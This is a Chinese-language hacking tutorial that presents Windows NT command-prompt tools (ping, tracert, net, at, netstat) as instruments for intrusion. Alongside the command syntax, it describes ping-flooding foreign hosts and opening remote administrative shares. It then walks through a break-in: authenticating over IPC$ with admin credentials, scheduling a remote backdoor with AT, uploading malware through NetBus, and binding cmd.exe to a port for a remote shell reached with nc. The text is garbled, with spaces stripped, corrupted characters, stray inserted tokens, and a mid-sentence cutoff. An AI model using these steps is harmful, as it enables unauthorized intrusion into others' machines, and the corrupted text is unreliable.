XP命令提示符详解及IP查询

XP命令提示符详解及IP查询长，但对网络安全的兴趣却日益高涨，但经过一段时间以来对国内黑客站点的浏览以及部份BBS、留言版上的有关资讯，我发现国内很多新手似乎对网上零星散见的黑客软件极感兴趣，而不重视相关系统知识的积累，我觉得这是一个不好的趋向，所以呢，在这儿把自己相当浅薄的一些经验写出来，希望能够起到抛砖引玉的作用。今天说些什么好呢,对了，再说两句废话吧，“工欲善其事，必先利其器”--当然不是让你再满世界去找新的黑客软件啦（其实我不反对使用这些软件，相反我很喜欢用它们，但是必须是在知其所以然的情况下使用，才有可能对自身的电脑水平有所帮助），要进行入侵工作的话，至少（我认为）得装上NT操作系统，以它作为入侵平台，因为NT本身对网络的支持可以说比WIN9X来得更强大得多……当然，如果想对UNIX系统动点小手术（网络中的UNIX可始终还是主流呀）而又没钱装UNIX的话，LINUX也极佳的选择（特别是现在国内至少有七八种中文LINUX版本一想当年要给REDHAT配上中文支持是何等麻烦……），至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等字串4然后还得再学点编程语言，至少C与UNIX下的SHELL编程得会一点，能看懂人家写的利用各种漏洞的程序，能对它进行修改，偶尔还能写几个小程序放到网上让大伙儿乐乐，这样玩起来才可能有成就感（其实我自己还不太行，但这多少是个目标）好了，废话少说，先讲讲一些M$系统里自带的相关网络程序的使用吧。在忖$的操作系统中，与网络安全较有关系的几个命令/程序是:pingwinipcfgtracertnetatnetstat,且待我慢慢道来：ping:这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。Usage:ping[-t][-a][-ncount][-lsize][-f][-iTTL][-vTOS][-rcount][-scount][[-jhost-list][-khost-list]][-wtimeout]destination-listOptions:tPingtheSpecifedhostuntilinterrupted.（除非人为中止，否则一直Ping下去）aResolveaddressestohostnames.（把IP转为主机名）ncountNumberofechorequeststosend.（响应请求的数量）sizeSendbuffersize.（封包的大小）字串4fSetDon'tFragmentflaginPaCket.（信息包中无碎片）iTTLTimeToLive.（时间）vTOSTypeOfSerViCe.（服务类型）rcountRecordrouteforcounthops.-scountTimestampforcounthops.jhost-listLoosesourceroutealonghost-list.-khost-listStrictsourceroutealonghost-list.（较严格的唉，怎么译好算了，放着吧）-wtimeoutTimeoutinmillisecondstowaitforeachreply.（timeout的时间）比如大家可能都知道的一个命令#ping-f-s65000***.***.***.***或者前阶段大家所谓Ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。其实这个命令主要是用来看对方应答的速度，如果怎么Ping得到的结果都是requesttimeout。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。winiPcfg:这是用来看自己IP位址的小工具，亚皿98自带，NT里则网络监视器里就能看到IP了，还有个小实用程序叫……好象是叫IPCONFIG吧，没怎么用，都快忘了……这种东东网上其实相当之多，但既然“自带”，又何须外求，何况网上下载的黑客的东东里有没有特洛伊犹未可知，再说了，如果你不是在自己的“爱姬”上运行，岂不是就没法干活,--哈，不好意思，跑题了，但--接着跑两句:可以把一些常用的、经典的工具上传到网上，当作一个备份，什么时候在网吧、某家公司要干活的话，直接下载就是一个完整无缺的工具包了。字串4这个东东相当简单，直接在DOS下键入命令就是了，没有什么参数。tracert:是验证通往远程主机路径的实用程序用法:tracert[-d][-hmaximum_hoPs][-jhost-list][-wtimeout]target_name参数:-dDonotresolveaddressestohostnames.（不将IP转为主机名）-hmaximum_hopsMaximumnumberofhopstosearchfortarget.（最大跟踪数量）-jhost-listLoosesourceroutealonghost-list.-wtimeoutWaittimeoutmillisecondsforeachrePly.（timeout的时间）最简单的用法就是tracerthostname其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址，你知道该怎么利用它吗,我略为解释一下吧:跟踪通往30的路由，最大30:第一行:*&八%&*我就是从这里出去的（呵，真不想说八&八）第四行:是不是快要出国了呢,第九行:呀〜这是日本鬼子的地盘……net：这可是个非常棒的东西，如果不会用的话，赶紧睁大眼睛噢这个命令的语法是:可用的命令包括:NETACCOUNTSNETHELPNETSHARENETCOMPUTERNETHELPMSGNETSTART字串1NETCONFIGNETLOCALGROUPNETSTATISTICSNETCONFIGSERVERNETNAMENETSTOPNETCONFIGWORKSTATIONNETPAUSENETTIMENETCONTINUENETPRINTNETUSENETFILENETSENDNETUSERNETGROUPNETSESSIONNETVIEWNETHELPSERVICES列出用户可以启动的网络服务。NETHELPSYNTAX解释如何阅读NETHELP语法行。NETHELPcommandMORE用于逐屏显示帮助。我可就不逐样解释了--这样会把我的手指累坏，就说说常用的两个命令吧view这个命令的语法是：NETVIEW[∖computername/DOMAIN[:domainname]]NETVIEW/NETWORK:NW[\computername]NETVIEW用于显示一个计算机上共享资源的列表。当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。\computername指用户希望浏览其共享资源的计算机。/DOMAIN:domainname指定用户希望浏览有效的计算机所在的域。如果省略了域名，就会显示局域网络上的所有域。/NETWORK:NW显示NetWare网络上所有可用的服务器。如果指定了一个计算机名，就会显示NetWare网络中那个计算机上的可用资源。至于举例嘛，比如你知道一个远程计算机***.***.**.***上有开资源共享，那么运行字串6netview\***.***.**.***就可以了use这个命令的语法是:NETUSE[devicename*][\computernamesharename[volume][password*]][/USER:[domainname]username][[/DELETE][/PERSISTENT:{YESNO}]]NETUSE[devicename*][password*]][/HOME]NETUSE[/PERSISTENT:{YESNO}]NETUSE用于将计算机与共享的资源相连接，或者切断计算机与共享资源的连接。当不带选项使用本命令时，它会列出计算机的连接。devicename指定一个名字以便与资源相连接，或者指定要切断的设备。有两种类型的设备名：磁盘驱动器(D:至Z:)和打印机(LPT1:至LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。\computername指控制共享资源的计算机的名字。如果计算机名中包含有空字符，就要将双反斜线(\)和计算机名一起用引号("")括起来。计算机名可以有1到15个字符。sharename指共享资源的网络名字。volume指定一个服务器上的NetWare卷。用户必须安装Netware的客户服务（WindowsNT工作站）或者Netware的网关服务（WindowsNT服务器）并使之与NetWare服务器相连。字串4password指访问共享资源所需要的密码。*进行密码提示。当在密码提示符下输入密码时，密码是不会显示的。/USER指定连接时的一个不同的用户名。domainname指定另外一个域。如果缺省域，就会使用当前登录的域。username指定登录的用户名。/HOME将用户与他们的宿主目录相连。/DELETE取消一个网络连接，并且从永久连接列表中删除该连接。/PERSISTENT控制对永久网络连接的使用。其缺省值是最近使用的设置。YES在连接产生时保存它们，并在下次登录时恢复它们。NO不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用/DELETE选项开关来删除永久连接。PS:前两天在绿色兵团的贴子里见到一位仁兄的话，与这个命令有异曲共工之妙，也说明一个大概:在浏览器中输入file:///\***.***.**.***c$则网上共享的C盘内容就会显示出来了，就仿佛用浏览器上FTP站点看到的一样。各位不妨试试，还可试试举一反三……5.at:排定在特定的日期和时间运行某些命令和程序。运行AT命令之前必须先启动Schedule服务。瞧，现炒就得现卖，刚学了net命令，但这个Start命令我可没详述，自己看看帮助文件，摸索一下各种命令的用法吧。字串3C:>netstartscheduleSchedule正在启动服务 Schedulw服务启动成功。AT[\computername][[id][/DELETE]/DELETE[/YES]]AT[\computername]time[/INTERACTIVE][/EVERY:date[,...]/NEXT:date[,...]]"command"\computername指定远程计算机。如果省略这个参数命令会被排定在本机上运行。id指定给排定进度命令的识别号。/delete删除某个已排定进度的命令。如果省略标识，计算机上所有已排定进度的命令都会被删除。/yes用于删除所有作业，且不想在运行删除时显示确认信息。time指定命令运行的时间。/interactive允许作业在运行时，与用户通过桌面交互。/every:date[,...]指定在每周或每月的某日（或某几日）运行命令。如果省略日期，则默认为在每月的本日运行。/next:date[,...]指定在下一个指定日期（如，下周三），运行命令。如果省略日期，则默认为在每月的本日运行。"command"准备运行的WindowsNT命令或批处理文件。知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:利用管理员登陆到目的服务器，方法为:netuse\x.x.x.xipc$“adminpwd"/user:"adminuser”（这里具体方法可参见KILLUSA的文章《HOWTOGETINNT》）利用ntsrv.exe启动远程：netsvc∖x.x.x.xschedule/start3利用AT.EXE在远程服务器设置程序定时运行，当然最快运行最理想，所以，你可以用letmein.exe得到服务器的时间，然后：at\x.x.x.x00:00ntsrv.exe/port:64321其中00:00要改为用letmein.exe得回来的具体时间+一点容量，等一会后，再在本地启动口0计口$.0*0,键入目的服务器得ip地址或hostname，连接〜比如第一种方法，你想要在目的服务器运行诸如病毒之类的东东，可以利用netbus得上传功能，将各种“大补丸”上传至目的服务器，再用netbus的〃StartProgram〃，键入完整路径，就。卜了〜第二种方法是利用netbus的“Appredirect”功能，启动远程telnet服务，如下：在netbus中击“Appredirect"，键入"C:>winntsystem32cmd.exe",Port为：4321,服务就启动了，然后在本地运行：ncx.x.x.x4321,出现dos启动的画面就表示连接成功：Microsoft(R)WindowsNT(TM)(C)Copyright1985-1996MicrosoftCorp.C：>注:这里有一小段是抄KILLUSA的文章一别找我要稿费啊八&八6.netstat这是一个观察网络连接状态的实用工具。它能检验IP的当前连接状态，在断定你的基本级通信正在进行后，就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话，它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具，是WIN界面的，更加直观而已，并没有多什么功能，这个命令的具体用法如下：字串2DisplaysprotocolstatisticsandcurrentTCP/IPnetworkconnections.(显示协议与当前网络连接)NETSTAT[-a][-e][-n][-s][-pproto][-r][interval]aDisplaysallconnectionsandlisteningports.（显示所有连接和监听端口）eDisplaysEthernetstatistics.Thismaybecombinedwiththe-soption.（显示以太连接，可以与-S连用）nDisplaysaddressesandportnumbersinnumericalform.（显示地址和端口）pprotoShowsconnectionsfortheprotocolspecifiedbyproto;protomaybeTCPorUDP.Ifusedwiththe-soptiontodisplayper-protocolstatis